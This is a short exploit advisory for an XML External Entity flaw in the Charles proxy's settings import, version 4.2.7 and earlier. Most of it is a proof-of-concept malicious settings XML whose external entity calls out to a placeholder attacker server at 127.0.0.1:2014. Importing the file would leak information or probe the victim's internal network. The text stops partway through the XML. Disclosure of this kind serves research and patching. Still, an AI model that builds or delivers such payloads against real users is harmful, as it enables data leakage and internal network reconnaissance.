Charles 4.2.7 XML External Entity
Software Link: https://www.charlesproxy.com Date:11.12.2018 Exploit Author:CK01 Version:<=4.2.7 Security Issue: The XML External Entity vulnerability exists in the Charles import/export setup option. If the user imports the "Charles Settings.xml" of the attacker, the internal network may be detected and the information may be leaked. POC: 1.Charles Setting.xml:(127.0.0.1 -> attacker's server ) <?xml version='1.0' encoding='UTF-8' ?> <?charles serialisation-version='2.0' ?> <!DOCTYPE data [ <!ENTITY file SYSTEM "jar:http://127.0.0.1:2014/!/">]> <charles-export> <proxyConfiguration> <enableSOCKSProxy>false</enableSOCKSProxy> <dynamicHTTPPort>false</dynamicHTTPPort> <dynamicSOCKSPort>false</dynamicSOCKSPort> <enableSOCKSTransparentHTTPProxying>true</enableSOCKSTransparentHTTPProxying> <port>8888</port>